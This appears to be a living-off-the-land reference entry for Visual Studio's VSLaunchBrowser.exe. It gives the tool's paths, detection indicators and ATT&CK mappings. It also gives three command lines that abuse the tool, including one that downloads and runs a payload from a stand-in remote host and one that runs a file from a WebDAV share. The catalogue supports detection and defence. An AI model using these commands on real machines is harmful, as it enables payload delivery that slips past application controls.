.. /VSLaunchBrowser.exe
Microsoft Visual Studio browser launcher tool for web applications debugging
C:\Program Files\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
C:\Program Files (x86)\Microsoft Visual Studio\<version>\Community\Common7\IDE\VSLaunchBrowser.exe
IOC: cmd.exe as sub-process of VSLaunchBrowser
IOC: URL on a VSLaunchBrowser command line
IOC: VSLaunchBrowser making unexpected network connections or DNS requests
Download and execute payload from remote server
VSLaunchBrowser.exe .exe http://example.com/payload
Use case It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Privileges required User
Operating systems Windows
ATT&CK® technique T1105 Tags Download: INetCache
Execute payload via VSLaunchBrowser as parent process
VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
Use case It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Privileges required User
Operating systems Windows
ATT&CK® technique T1127 Tags Execute: EXE
Execute payload from WebDAV server via VSLaunchBrowser as parent process
VSLaunchBrowser.exe .exe \\Server\Path\file
Use case It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Privileges required User
Operating systems Windows
ATT&CK® technique T1127 Tags Execute: EXE
Execute: Remote